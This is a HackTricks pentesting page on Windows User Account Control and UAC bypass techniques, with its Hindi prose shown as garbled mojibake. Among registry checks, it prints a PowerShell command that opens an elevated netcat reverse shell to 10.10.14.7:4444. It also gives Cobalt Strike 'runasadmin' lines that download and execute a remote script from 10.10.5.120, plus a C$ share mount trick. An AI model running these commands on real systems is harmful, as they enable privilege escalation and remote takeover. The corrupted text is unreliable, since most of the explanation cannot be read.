30 KiB
UAC - User Account Control
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the ЁЯТм Discord group or the telegram group or follow us on Twitter ЁЯРж @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get Access Today:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
UAC
User Account Control (UAC) рдПрдХ рд╡рд┐рд╢реЗрд╖рддрд╛ рд╣реИ рдЬреЛ рдЙрдЪреНрдЪ рдЧрддрд┐рд╡рд┐рдзрд┐рдпреЛрдВ рдХреЗ рд▓рд┐рдП рд╕рд╣рдорддрд┐ рд╕рдВрдХреЗрдд рд╕рдХреНрд╖рдо рдХрд░рддреА рд╣реИред рдЕрдиреБрдкреНрд░рдпреЛрдЧреЛрдВ рдХреЗ рд╡рд┐рднрд┐рдиреНрди integrity
рд╕реНрддрд░ рд╣реЛрддреЗ рд╣реИрдВ, рдФрд░ рдПрдХ рдЙрдЪреНрдЪ рд╕реНрддрд░ рд╡рд╛рд▓рд╛ рдХрд╛рд░реНрдпрдХреНрд░рдо рдЙрди рдХрд╛рд░реНрдпреЛрдВ рдХреЛ рдХрд░рдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рд╣реЛрддрд╛ рд╣реИ рдЬреЛ рд╕рдВрднрд╡рддрдГ рд╕рд┐рд╕реНрдЯрдо рдХреЛ рдЦрддрд░реЗ рдореЗрдВ рдбрд╛рд▓ рд╕рдХрддреЗ рд╣реИрдВред рдЬрдм UAC рд╕рдХреНрд╖рдо рд╣реЛрддрд╛ рд╣реИ, рдЕрдиреБрдкреНрд░рдпреЛрдЧ рдФрд░ рдХрд╛рд░реНрдп рд╣рдореЗрд╢рд╛ рдЧреИрд░-рдкреНрд░рд╢рд╛рд╕рдХ рдЦрд╛рддреЗ рдХреЗ рд╕реБрд░рдХреНрд╖рд╛ рд╕рдВрджрд░реНрдн рдореЗрдВ рдЪрд▓рддреЗ рд╣реИрдВ рдЬрдм рддрдХ рдХрд┐ рдПрдХ рдкреНрд░рд╢рд╛рд╕рдХ рд╕реНрдкрд╖реНрдЯ рд░реВрдк рд╕реЗ рдЗрди рдЕрдиреБрдкреНрд░рдпреЛрдЧреЛрдВ/рдХрд╛рд░реНрдп рдХреЛ рд╕рд┐рд╕реНрдЯрдо рдкрд░ рдкреНрд░рд╢рд╛рд╕рдХ рд╕реНрддрд░ рдХреА рдкрд╣реБрдВрдЪ рджреЗрдиреЗ рдХреЗ рд▓рд┐рдП рдЕрдзрд┐рдХреГрдд рди рдХрд░реЗред рдпрд╣ рдПрдХ рд╕реБрд╡рд┐рдзрд╛ рд╣реИ рдЬреЛ рдкреНрд░рд╢рд╛рд╕рдХреЛрдВ рдХреЛ рдЕрдирдкреЗрдХреНрд╖рд┐рдд рдкрд░рд┐рд╡рд░реНрддрдиреЛрдВ рд╕реЗ рдмрдЪрд╛рддреА рд╣реИ рд▓реЗрдХрд┐рди рдЗрд╕реЗ рд╕реБрд░рдХреНрд╖рд╛ рд╕реАрдорд╛ рдирд╣реАрдВ рдорд╛рдирд╛ рдЬрд╛рддрд╛ рд╣реИред
рдЕрдзрд┐рдХрд╛рд░рд┐рддрд╛ рд╕реНрддрд░реЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рд▓рд┐рдП:
{% content-ref url="../windows-local-privilege-escalation/integrity-levels.md" %} integrity-levels.md {% endcontent-ref %}
рдЬрдм UAC рд▓рд╛рдЧреВ рд╣реЛрддрд╛ рд╣реИ, рдПрдХ рдкреНрд░рд╢рд╛рд╕рдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ 2 рдЯреЛрдХрди рджрд┐рдП рдЬрд╛рддреЗ рд╣реИрдВ: рдПрдХ рдорд╛рдирдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреБрдВрдЬреА, рдирд┐рдпрдорд┐рдд рд╕реНрддрд░ рдХреЗ рд░реВрдк рдореЗрдВ рдирд┐рдпрдорд┐рдд рдХреНрд░рд┐рдпрд╛рдПрдБ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдФрд░ рдПрдХ рдкреНрд░рд╢рд╛рд╕рдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдХреЗ рд╕рд╛рдеред
рдпрд╣ рдкреГрд╖реНрда UAC рдХреЗ рдХрд╛рдо рдХрд░рдиреЗ рдХреЗ рддрд░реАрдХреЗ рдкрд░ рдЧрд╣рд░рд╛рдИ рд╕реЗ рдЪрд░реНрдЪрд╛ рдХрд░рддрд╛ рд╣реИ рдФрд░ рд▓реЙрдЧрд┐рди рдкреНрд░рдХреНрд░рд┐рдпрд╛, рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЕрдиреБрднрд╡, рдФрд░ UAC рдЖрд░реНрдХрд┐рдЯреЗрдХреНрдЪрд░ рдХреЛ рд╢рд╛рдорд┐рд▓ рдХрд░рддрд╛ рд╣реИред рдкреНрд░рд╢рд╛рд╕рдХ рд╕реБрд░рдХреНрд╖рд╛ рдиреАрддрд┐рдпреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдпрд╣ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдХрд┐ UAC рдЙрдирдХреЗ рд╕рдВрдЧрдарди рдХреЗ рд▓рд┐рдП рд╕реНрдерд╛рдиреАрдп рд╕реНрддрд░ рдкрд░ рдХреИрд╕реЗ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ (secpol.msc рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ), рдпрд╛ рдЗрд╕реЗ Active Directory рдбреЛрдореЗрди рд╡рд╛рддрд╛рд╡рд░рдг рдореЗрдВ рд╕рдореВрд╣ рдиреАрддрд┐ рд╡рд╕реНрддреБрдУрдВ (GPO) рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдФрд░ рдзрдХреЗрд▓ рд╕рдХрддреЗ рд╣реИрдВред рд╡рд┐рднрд┐рдиреНрди рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рд╡рд┐рд╕реНрддрд╛рд░ рд╕реЗ рдЪрд░реНрдЪрд╛ рдХреА рдЧрдИ рд╣реИ рдпрд╣рд╛рдБред UAC рдХреЗ рд▓рд┐рдП 10 рд╕рдореВрд╣ рдиреАрддрд┐ рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рд╕реЗрдЯ рдХреА рдЬрд╛ рд╕рдХрддреА рд╣реИрдВред рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рддрд╛рд▓рд┐рдХрд╛ рдЕрддрд┐рд░рд┐рдХреНрдд рд╡рд┐рд╡рд░рдг рдкреНрд░рджрд╛рди рдХрд░рддреА рд╣реИ:
UAC Bypass Theory
рдХреБрдЫ рдХрд╛рд░реНрдпрдХреНрд░рдо рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ рдЙрдЪреНрдЪ рд╕реНрддрд░ рдкрд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕рдореВрд╣ рд╕реЗ рд╕рдВрдмрдВрдзрд┐рдд рд╣реЛрдиреЗ рдкрд░ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ рдЙрдЪреНрдЪреАрдХреГрдд рд╣реЛрддреЗ рд╣реИрдВред рдЗрди рдмрд╛рдЗрдирд░реА рдореЗрдВ рдЙрдирдХреЗ Manifests рдХреЗ рдЕрдВрджрд░ autoElevate рд╡рд┐рдХрд▓реНрдк рдХрд╛ рдорд╛рди True рд╣реЛрддрд╛ рд╣реИред рдмрд╛рдЗрдирд░реА рдХреЛ Microsoft рджреНрд╡рд╛рд░рд╛ рд╣рд╕реНрддрд╛рдХреНрд╖рд░рд┐рдд рд╣реЛрдирд╛ рдЪрд╛рд╣рд┐рдПред
рдлрд┐рд░, UAC рдХреЛ рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП (рдЙрдЪреНрдЪ integrity рд╕реНрддрд░ рд╕реЗ рдЙрдЪреНрдЪ рдкрд░) рдХреБрдЫ рд╣рдорд▓рд╛рд╡рд░ рдЗрд╕ рдкреНрд░рдХрд╛рд░ рдХреА рдмрд╛рдЗрдирд░реА рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВ рддрд╛рдХрд┐ рд╡реЗ рдордирдорд╛рдиреЗ рдХреЛрдб рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХреЗрдВ рдХреНрдпреЛрдВрдХрд┐ рдЗрд╕реЗ рдЙрдЪреНрдЪ рд╕реНрддрд░ рдХреА рд╕реБрд░рдХреНрд╖рд╛ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╕реЗ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рдПрдЧрд╛ред
рдЖрдк sigcheck.exe рдЙрдкрдХрд░рдг рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ рдмрд╛рдЗрдирд░реА рдХрд╛ Manifest рдЪреЗрдХ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдФрд░ рдЖрдк Process Explorer рдпрд╛ Process Monitor (Sysinternals рдХреЗ) рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдкреНрд░рдХреНрд░рд┐рдпрд╛рдУрдВ рдХреЗ integrity рд╕реНрддрд░ рдХреЛ рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВред
Check UAC
UAC рд╕рдХреНрд╖рдо рд╣реИ рдпрд╛ рдирд╣реАрдВ, рдЗрд╕рдХреА рдкреБрд╖реНрдЯрд┐ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд░реЗрдВ:
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA REG_DWORD 0x1
рдпрджрд┐ рдпрд╣ 1
рд╣реИ рддреЛ UAC рд╕рдХреНрд░рд┐рдп рд╣реИ, рдпрджрд┐ рдпрд╣ 0
рд╣реИ рдпрд╛ рдпрд╣ рдореМрдЬреВрдж рдирд╣реАрдВ рд╣реИ, рддреЛ UAC рдирд┐рд╖реНрдХреНрд░рд┐рдп рд╣реИред
рдлрд┐рд░, рдХреМрди рд╕рд╛ рд╕реНрддрд░ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ, рдЗрд╕рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ:
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin REG_DWORD 0x5
- рдпрджрд┐
0
рд╣реИ рддреЛ, UAC рд╕рдВрдХреЗрдд рдирд╣реАрдВ рджреЗрдЧрд╛ (рдЬреИрд╕реЗ рдЕрдХреНрд╖рдо) - рдпрджрд┐
1
рд╣реИ рддреЛ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рд╕реЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рдкреВрдЫрд╛ рдЬрд╛рдПрдЧрд╛ рдЙрдЪреНрдЪ рдЕрдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд╕рд╛рде рдмрд╛рдЗрдирд░реА рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП (рд╕реБрд░рдХреНрд╖рд┐рдд рдбреЗрд╕реНрдХрдЯреЙрдк рдкрд░) - рдпрджрд┐
2
рд╣реИ (рд╣рдореЗрд╢рд╛ рдореБрдЭреЗ рд╕реВрдЪрд┐рдд рдХрд░реЗрдВ) UAC рд╣рдореЗрд╢рд╛ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рд╕реЗ рдкреБрд╖реНрдЯрд┐ рдорд╛рдВрдЧреЗрдЧрд╛ рдЬрдм рд╡рд╣ рдЙрдЪреНрдЪ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд╕рд╛рде рдХреБрдЫ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░реЗрдЧрд╛ (рд╕реБрд░рдХреНрд╖рд┐рдд рдбреЗрд╕реНрдХрдЯреЙрдк рдкрд░) - рдпрджрд┐
3
рд╣реИ рддреЛ1
рдХреА рддрд░рд╣ рд▓реЗрдХрд┐рди рд╕реБрд░рдХреНрд╖рд┐рдд рдбреЗрд╕реНрдХрдЯреЙрдк рдкрд░ рдЖрд╡рд╢реНрдпрдХ рдирд╣реАрдВ - рдпрджрд┐
4
рд╣реИ рддреЛ2
рдХреА рддрд░рд╣ рд▓реЗрдХрд┐рди рд╕реБрд░рдХреНрд╖рд┐рдд рдбреЗрд╕реНрдХрдЯреЙрдк рдкрд░ рдЖрд╡рд╢реНрдпрдХ рдирд╣реАрдВ - рдпрджрд┐
5
рд╣реИ (рдбрд┐рдлрд╝реЙрд▓реНрдЯ) рддреЛ рдпрд╣ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рд╕реЗ рдкреБрд╖реНрдЯрд┐ рдорд╛рдВрдЧреЗрдЧрд╛ рдХрд┐ рдЙрдЪреНрдЪ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд╕рд╛рде рдЧреИрд░-рд╡рд┐рдВрдбреЛрдЬ рдмрд╛рдЗрдирд░реА рдЪрд▓рд╛рдиреЗ рдХреЗ рд▓рд┐рдП
рдлрд┐рд░, рдЖрдкрдХреЛ LocalAccountTokenFilterPolicy
рдХреЗ рдорд╛рди рдкрд░ рдзреНрдпрд╛рди рджреЗрдирд╛ рд╣реЛрдЧрд╛
рдпрджрд┐ рдорд╛рди 0
рд╣реИ, рддреЛ рдХреЗрд╡рд▓ RID 500 рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ (рдмрд┐рд▓реНрдЯ-рдЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ) UAC рдХреЗ рдмрд┐рдирд╛ рдкреНрд░рд╢рд╛рд╕рдирд┐рдХ рдХрд╛рд░реНрдп рдХрд░ рд╕рдХрддрд╛ рд╣реИ, рдФрд░ рдпрджрд┐ рдЗрд╕рдХрд╛ 1
рд╣реИ, рддреЛ "Administrators" рд╕рдореВрд╣ рдХреЗ рд╕рднреА рдЦрд╛рддреЗ рдРрд╕рд╛ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
рдФрд░, рдЕрдВрдд рдореЗрдВ FilterAdministratorToken
рдХреБрдВрдЬреА рдХреЗ рдорд╛рди рдкрд░ рдзреНрдпрд╛рди рджреЗрдВ
рдпрджрд┐ 0
(рдбрд┐рдлрд╝реЙрд▓реНрдЯ) рд╣реИ, рддреЛ рдмрд┐рд▓реНрдЯ-рдЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЦрд╛рддрд╛ рджреВрд░рд╕реНрде рдкреНрд░рд╢рд╛рд╕рдирд┐рдХ рдХрд╛рд░реНрдп рдХрд░ рд╕рдХрддрд╛ рд╣реИ рдФрд░ рдпрджрд┐ 1
рд╣реИ рддреЛ рдмрд┐рд▓реНрдЯ-рдЗрди рдЦрд╛рддрд╛ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рджреВрд░рд╕реНрде рдкреНрд░рд╢рд╛рд╕рдирд┐рдХ рдХрд╛рд░реНрдп рдирд╣реАрдВ рдХрд░ рд╕рдХрддрд╛, рдЬрдм рддрдХ LocalAccountTokenFilterPolicy
рдХреЛ 1
рдкрд░ рд╕реЗрдЯ рдирд╣реАрдВ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред
рд╕рд╛рд░рд╛рдВрд╢
- рдпрджрд┐
EnableLUA=0
рдпрд╛ рдореМрдЬреВрдж рдирд╣реАрдВ рд╣реИ, рдХрд┐рд╕реА рдХреЗ рд▓рд┐рдП рднреА UAC рдирд╣реАрдВ - рдпрджрд┐
EnableLua=1
рдФрд░LocalAccountTokenFilterPolicy=1
, рдХрд┐рд╕реА рдХреЗ рд▓рд┐рдП рднреА UAC рдирд╣реАрдВ - рдпрджрд┐
EnableLua=1
рдФрд░LocalAccountTokenFilterPolicy=0
рдФрд░FilterAdministratorToken=0
, RID 500 (рдмрд┐рд▓реНрдЯ-рдЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ) рдХреЗ рд▓рд┐рдП рдХреЛрдИ UAC рдирд╣реАрдВ - рдпрджрд┐
EnableLua=1
рдФрд░LocalAccountTokenFilterPolicy=0
рдФрд░FilterAdministratorToken=1
, рд╕рднреА рдХреЗ рд▓рд┐рдП UAC
рдпрд╣ рд╕рднреА рдЬрд╛рдирдХрд╛рд░реА metasploit рдореЙрдбреНрдпреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХрддреНрд░ рдХреА рдЬрд╛ рд╕рдХрддреА рд╣реИ: post/windows/gather/win_privs
рдЖрдк рдЕрдкрдиреЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд╕рдореВрд╣реЛрдВ рдХреА рднреА рдЬрд╛рдВрдЪ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЕрдЦрдВрдбрддрд╛ рд╕реНрддрд░ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:
net user %username%
whoami /groups | findstr Level
UAC рдмрд╛рдпрдкрд╛рд╕
{% hint style="info" %} рдзреНрдпрд╛рди рджреЗрдВ рдХрд┐ рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рдкреАрдбрд╝рд┐рдд рддрдХ рдЧреНрд░рд╛рдлрд┐рдХрд▓ рдкрд╣реБрдВрдЪ рд╣реИ, рддреЛ UAC рдмрд╛рдпрдкрд╛рд╕ рд╕реАрдзрд╛ рд╣реИ рдХреНрдпреЛрдВрдХрд┐ рдЖрдк рдмрд╕ "рд╣рд╛рдБ" рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдЬрдм UAS рдкреНрд░реЙрдореНрдкреНрдЯ рдкреНрд░рдХрдЯ рд╣реЛрддрд╛ рд╣реИ {% endhint %}
UAC рдмрд╛рдпрдкрд╛рд╕ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рд╕реНрдерд┐рддрд┐ рдореЗрдВ рд╣реЛрддреА рд╣реИ: UAC рд╕рдХреНрд░рд┐рдп рд╣реИ, рдЖрдкрдХреА рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдПрдХ рдордзреНрдпрдо рдЕрдЦрдВрдбрддрд╛ рд╕рдВрджрд░реНрдн рдореЗрдВ рдЪрд▓ рд░рд╣реА рд╣реИ, рдФрд░ рдЖрдкрдХрд╛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдкреНрд░рд╢рд╛рд╕рдХреЛрдВ рд╕рдореВрд╣ рдореЗрдВ рд╣реИред
рдпрд╣ рдЙрд▓реНрд▓реЗрдЦ рдХрд░рдирд╛ рдорд╣рддреНрд╡рдкреВрд░реНрдг рд╣реИ рдХрд┐ UAC рдХреЛ рдЙрдЪреНрдЪрддрдо рд╕реБрд░рдХреНрд╖рд╛ рд╕реНрддрд░ (рд╣рдореЗрд╢рд╛) рдореЗрдВ рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдирд╛ рдмрд╣реБрдд рдХрдард┐рди рд╣реИ, рдмрдЬрд╛рдп рдЗрд╕рдХреЗ рдХрд┐ рдпрд╣ рдХрд┐рд╕реА рдЕрдиреНрдп рд╕реНрддрд░ (рдбрд┐рдлрд╝реЙрд▓реНрдЯ) рдореЗрдВ рд╣реЛред
UAC рдЕрдХреНрд╖рдо
рдпрджрд┐ UAC рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рдЕрдХреНрд╖рдо рд╣реИ (ConsentPromptBehaviorAdmin
0
рд╣реИ) рддреЛ рдЖрдк рдкреНрд░рд╢рд╛рд╕рдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд╕рд╛рде рдПрдХ рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ (рдЙрдЪреНрдЪ рдЕрдЦрдВрдбрддрд╛ рд╕реНрддрд░) рдХреБрдЫ рдЗрд╕ рддрд░рд╣:
#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"
UAC рдмрд╛рдпрдкрд╛рд╕ рдЯреЛрдХрди рдбреБрдкреНрд▓реАрдХреЗрд╢рди рдХреЗ рд╕рд╛рде
- https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/
- https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html
рдмрд╣реБрдд рдмреБрдирд┐рдпрд╛рджреА UAC "рдмрд╛рдпрдкрд╛рд╕" (рдкреВрд░реНрдг рдлрд╝рд╛рдЗрд▓ рдкреНрд░рдгрд╛рд▓реА рдкрд╣реБрдБрдЪ)
рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рдПрдХ рд╢реЗрд▓ рд╣реИ рдЬрд┐рд╕рдореЗрдВ рдПрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╣реИ рдЬреЛ Administrators рд╕рдореВрд╣ рдХреЗ рдЕрдВрджрд░ рд╣реИ, рддреЛ рдЖрдк C$ рд╕рд╛рдЭрд╛ рдХреЛ SMB (рдлрд╝рд╛рдЗрд▓ рдкреНрд░рдгрд╛рд▓реА) рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдПрдХ рдирдП рдбрд┐рд╕реНрдХ рдореЗрдВ рд╕реНрдерд╛рдиреАрдп рд░реВрдк рд╕реЗ рдорд╛рдЙрдВрдЯ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЖрдкрдХреЛ рдлрд╝рд╛рдЗрд▓ рдкреНрд░рдгрд╛рд▓реА рдХреЗ рдЕрдВрджрд░ рд╕рдм рдХреБрдЫ рддрдХ рдкрд╣реБрдБрдЪ рдкреНрд░рд╛рдкреНрдд рд╣реЛрдЧреА (рдпрд╣рд╛рдБ рддрдХ рдХрд┐ Administrator рдХрд╛ рд╣реЛрдо рдлрд╝реЛрд▓реНрдбрд░)ред
{% hint style="warning" %} рд▓рдЧрддрд╛ рд╣реИ рдХрд┐ рдпрд╣ рдЯреНрд░рд┐рдХ рдЕрдм рдХрд╛рдо рдирд╣реАрдВ рдХрд░ рд░рд╣реА рд╣реИ {% endhint %}
net use Z: \\127.0.0.1\c$
cd C$
#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop
UAC рдмрд╛рдпрдкрд╛рд╕ рдХреЛрдмрд╛рд▓реНрдЯ рд╕реНрдЯреНрд░рд╛рдЗрдХ рдХреЗ рд╕рд╛рде
рдХреЛрдмрд╛рд▓реНрдЯ рд╕реНрдЯреНрд░рд╛рдЗрдХ рддрдХрдиреАрдХреЗрдВ рдХреЗрд╡рд▓ рддрднреА рдХрд╛рдо рдХрд░реЗрдВрдЧреА рдЬрдм UAC рдХреЛ рдЗрд╕рдХреЗ рдЕрдзрд┐рдХрддрдо рд╕реБрд░рдХреНрд╖рд╛ рд╕реНрддрд░ рдкрд░ рд╕реЗрдЯ рдирд╣реАрдВ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реЛред
# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]
# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
Empire рдФрд░ Metasploit рдореЗрдВ UAC рдХреЛ bypass рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрдИ рдореЙрдбреНрдпреВрд▓ рд╣реИрдВред
KRBUACBypass
рджрд╕реНрддрд╛рд╡реЗрдЬрд╝ рдФрд░ рдЙрдкрдХрд░рдг https://github.com/wh0amitz/KRBUACBypass рдореЗрдВ
UAC bypass exploits
UACME рдЬреЛ рдХрдИ UAC bypass exploits рдХрд╛ рд╕рдВрдХрд▓рди рд╣реИред рдзреНрдпрд╛рди рджреЗрдВ рдХрд┐ рдЖрдкрдХреЛ UACME рдХреЛ рд╡рд┐рдЬрд╝реБрдЕрд▓ рд╕реНрдЯреВрдбрд┐рдпреЛ рдпрд╛ msbuild рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╕рдВрдХрд▓рд┐рдд рдХрд░рдирд╛ рд╣реЛрдЧрд╛ред рд╕рдВрдХрд▓рди рдХрдИ рдирд┐рд╖реНрдкрд╛рджрди рдпреЛрдЧреНрдп рдлрд╝рд╛рдЗрд▓реЗрдВ рдмрдирд╛рдПрдЧрд╛ (рдЬреИрд╕реЗ Source\Akagi\outout\x64\Debug\Akagi.exe
), рдЖрдкрдХреЛ рдпрд╣ рдЬрд╛рдирдирд╛ рд╣реЛрдЧрд╛ рдХрд┐ рдЖрдкрдХреЛ рдХреМрди рд╕реА рдЪрд╛рд╣рд┐рдПред
рдЖрдкрдХреЛ рд╕рд╛рд╡рдзрд╛рди рд░рд╣рдирд╛ рдЪрд╛рд╣рд┐рдП рдХреНрдпреЛрдВрдХрд┐ рдХреБрдЫ рдмрд╛рдпрдкрд╛рд╕ рдХреБрдЫ рдЕрдиреНрдп рдХрд╛рд░реНрдпрдХреНрд░рдореЛрдВ рдХреЛ рдкреНрд░реЙрдореНрдкреНрдЯ рдХрд░реЗрдВрдЧреЗ рдЬреЛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рд╕реВрдЪрд┐рдд рдХрд░реЗрдВрдЧреЗ рдХрд┐ рдХреБрдЫ рд╣реЛ рд░рд╣рд╛ рд╣реИред
UACME рдореЗрдВ рдирд┐рд░реНрдорд╛рдг рд╕рдВрд╕реНрдХрд░рдг рд╣реИ рдЬрд┐рд╕рд╕реЗ рдкреНрд░рддреНрдпреЗрдХ рддрдХрдиреАрдХ рдХрд╛рдо рдХрд░рдирд╛ рд╢реБрд░реВ рд╣реБрдИред рдЖрдк рдЕрдкрдиреЗ рд╕рдВрд╕реНрдХрд░рдгреЛрдВ рдХреЛ рдкреНрд░рднрд╛рд╡рд┐рдд рдХрд░рдиреЗ рд╡рд╛рд▓реА рддрдХрдиреАрдХ рдХреЗ рд▓рд┐рдП рдЦреЛрдЬ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:
PS C:\> [environment]::OSVersion.Version
Major Minor Build Revision
----- ----- ----- --------
10 0 14393 0
Also, using this page you get the Windows release 1607
from the build versions.
More UAC bypass
рд╕рднреА рддрдХрдиреАрдХреЗрдВ рдЬреЛ рдпрд╣рд╛рдБ AUC рдХреЛ рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧ рдХреА рдЬрд╛рддреА рд╣реИрдВ рдПрдХ рдкреВрд░реНрдг рдЗрдВрдЯрд░реИрдХреНрдЯрд┐рд╡ рд╢реЗрд▓ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрддреА рд╣реИ (рдПрдХ рд╕рд╛рдорд╛рдиреНрдп nc.exe рд╢реЗрд▓ рдкрд░реНрдпрд╛рдкреНрдд рдирд╣реАрдВ рд╣реИ)ред
